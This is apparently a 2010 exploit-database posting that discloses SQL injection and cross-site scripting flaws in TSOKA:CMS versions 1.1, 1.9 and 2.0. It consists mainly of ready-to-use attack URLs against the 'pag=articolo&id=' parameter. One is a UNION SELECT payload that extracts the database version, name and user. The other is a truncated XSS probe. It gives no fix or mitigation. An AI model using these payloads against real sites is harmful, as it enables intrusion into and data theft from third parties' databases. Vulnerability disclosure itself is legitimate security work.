Home / os / winme

TSOKA:CMS v1.1 , v1.9 AND v2.0 SQL Injection & XSS Vulne

Posted on 28 March 2010

================================================================ TSOKA:CMS v1.1 , v1.9 AND v2.0 SQL Injection & XSS Vulnerability ================================================================ [~]----------------------------------------------------------------------------------------------------------------------- [~] TSOKA:CMS v1.1 , v1.9 AND v2.0 SQL Injection & XSS Vulnerability [~] [~] http://www.alanzard.com (from italy) [~] [~] [~] ---------------------------------------------------------------------------------------------------------------------- [~] Bug founded by d3v1l [Avram Marius] [~] [~] Date: 28.03.2010 [~] [~] [~] http://security-sh3ll.blogspot.com [~] [~] ---------------------------------------------------------------------------------------------------------------------- [~] articolo&id= SQL & XSS [~] [~] [~] Ex - [~] [~] http://[site]/?pag=articolo&id="> [~] http://[site]/?pag=articolo&id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8-- [~]------------------------------------------------------------------------------------------------------------------------ # Inj3ct0r.com [2010-03-28]

 

TOP